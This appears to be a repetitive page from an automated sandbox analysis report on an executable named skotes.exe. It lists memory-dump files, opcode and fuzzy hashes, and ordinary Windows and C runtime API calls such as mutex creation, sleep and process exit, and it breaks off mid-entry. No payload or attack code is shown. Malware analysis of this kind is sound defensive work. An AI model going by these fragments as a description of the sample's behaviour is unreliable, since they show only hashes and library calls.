Associated: 00000002.00000002.1525912586.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526059021.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526087920.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 373c28608a71fef0f36dfc6c949720e46e17a604b9b8b8080c0c35d3058c1bba
Instruction ID: ac88d00c7fd1434abbdc42a857d47dcf7a844d058dfc90003d98b8c894c1275f
Opcode Fuzzy Hash: 373c28608a71fef0f36dfc6c949720e46e17a604b9b8b8080c0c35d3058c1bba
Instruction Fuzzy Hash: 38F0823260722566EB316A76BC21B5B7B5DDF85770F188521FD18A7181DA60FC008EE0

Non-executed Functions

Function 00902EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00902F5F
__Mtx_unlock.LIBCPMT ref: 00902FCC
__Cnd_broadcast.LIBCPMT ref: 00902FE3
__Mtx_unlock.LIBCPMT ref: 009030F5
__Mtx_unlock.LIBCPMT ref: 0090319B

Memory Dump Source

Source File: 00000002.00000002.1524174368.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.1524157327.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524174368.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524227777.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524242520.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524259652.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524376644.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524392904.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524451309.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524466916.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524485077.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524499934.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524515004.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524529849.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524544527.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524559755.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524579261.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524594685.0000000000B1A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524609834.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524634271.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524664536.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524680248.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524696704.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524714794.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524731398.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524748370.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524764787.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525091086.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525110092.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525262166.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525281913.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525300505.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525319791.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525336840.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525357364.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525430181.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525478202.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525495881.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525608468.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525656892.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525912586.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526059021.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526087920.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 1d4bfefdd1d1834b6a58830845cbc862b7e192a9ec0ffdd929228391e339d52c
Instruction ID: ee2f84a62cd5deabd2e073d8c02c782d4188948795f63bec5f77b858e322f704
Opcode Fuzzy Hash: 1d4bfefdd1d1834b6a58830845cbc862b7e192a9ec0ffdd929228391e339d52c
Instruction Fuzzy Hash: B4A101B0A0521AEFDB10DFA5C845BAAB7BCFF59354F008529E815D7281EB31EA44CB91

Function 0093CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0093CC66

Memory Dump Source

Source File: 00000002.00000002.1524174368.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.1524157327.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524174368.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524227777.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524242520.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524259652.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524376644.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524392904.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524451309.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524466916.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524485077.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524499934.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524515004.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524529849.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524544527.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524559755.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524579261.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524594685.0000000000B1A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524609834.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524634271.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524664536.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524680248.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524696704.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524714794.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524731398.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524748370.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524764787.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525091086.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525110092.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525262166.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525281913.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525300505.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525319791.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525336840.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525357364.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525430181.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525478202.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525495881.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525608468.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525656892.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525912586.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526059021.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526087920.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: f92fa249f10ef3fb10f5d9e9689773018fe52af5358943b86d159d24c19243d1
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: B8B126B2904A459FDB25CF28C881BBEBBE9EF85340F14856AE855FB381D6349D01CF60

Function 0091BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0091BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0091BBE4
_xtime_get.LIBCPMT ref: 0091BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0091BC13

Memory Dump Source

Source File: 00000002.00000002.1524174368.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.1524157327.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524174368.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524227777.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524242520.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524259652.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524376644.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524392904.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524451309.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524466916.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524485077.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524499934.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524515004.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524529849.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524544527.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524559755.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524579261.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524594685.0000000000B1A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524609834.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524634271.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524664536.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524680248.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524696704.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524714794.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524731398.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524748370.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524764787.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525091086.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525110092.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525262166.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525281913.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525300505.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525319791.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525336840.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525357364.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525430181.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525478202.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525495881.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525608468.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525656892.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525912586.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526059021.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526087920.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 22a9280aa77af02b61a63b0ee37f1f6319c2f3b615f1fecb67dfff3c7f94023b
Instruction ID: eb85e6215d23add964f3602d6e0add12e9d8ce035bceb7b14c94efa3ce6f2a3a
Opcode Fuzzy Hash: 22a9280aa77af02b61a63b0ee37f1f6319c2f3b615f1fecb67dfff3c7f94023b
Instruction Fuzzy Hash: 5F211DB1A4021DAFDF00EBA4D885AFEB7B9EF48754F500055F501A7251DB34AD419BA1

Analysis Process: skotes.exePID: 4428, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1897
Total number of Limit Nodes:	9

Executed Functions

Function 0093652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,0093652A,?,?,?,?,?,00937661), ref: 00936566

Memory Dump Source

Source File: 00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000003.00000002.1530077629.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530404067.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530727548.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530766040.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530801626.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531725930.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531831280.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532331923.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532436211.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532489546.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532518977.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532547585.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532577868.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532605363.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532635329.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532671862.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532699440.0000000000B19000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532743572.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532788863.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532826407.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532857999.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532890478.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532922295.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532959513.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532989434.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533018188.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533046843.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533068917.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533099773.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533132016.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533161308.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533199223.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533222579.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533249817.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533361386.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533396199.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533424171.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533454868.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533489943.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533515592.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533543676.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533571210.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: f7f8b68482e314f1ebfe92302fc126998bd5457d40178a3ef614110ab0f5aef9
Instruction ID: bc7f8832eaaf15a657291110541a2cba1b911ee36f60abd8c3e2912774fb21eb
Opcode Fuzzy Hash: f7f8b68482e314f1ebfe92302fc126998bd5457d40178a3ef614110ab0f5aef9
Instruction Fuzzy Hash: 6EE08C30041108BACE26BB58DC09B483B29EB92744F008C20F9058A221CB65ED82CA81

Function 00909BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0090A963
CreateMutexA.KERNELBASE(00000000,00000000,00963254), ref: 0090A981

Memory Dump Source

Source File: 00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000003.00000002.1530077629.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530404067.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530727548.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530766040.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1530801626.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531725930.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531831280.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1531878501.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532331923.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532436211.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532489546.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532518977.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532547585.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532577868.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532605363.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532635329.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532671862.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532699440.0000000000B19000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532743572.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532788863.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532826407.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532857999.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532890478.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532922295.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532959513.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1532989434.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533018188.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533046843.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533068917.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533099773.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533132016.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533161308.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533199223.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533222579.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533249817.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533278740.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533361386.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533396199.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533424171.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533454868.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533489943.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533515592.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533543676.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1533571210.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 353d2c792a918a1d31e4b665d8dc2fe08b36ebf673c6d36a329140b76cecaf78
Instruction ID: ec2c1051963cf29d929fe0c81804276481be1ae568e8ef1d4b71c434416f380c
Opcode Fuzzy Hash: 353d2c792a918a1d31e4b665d8dc2fe08b36ebf673c6d36a329140b76cecaf78
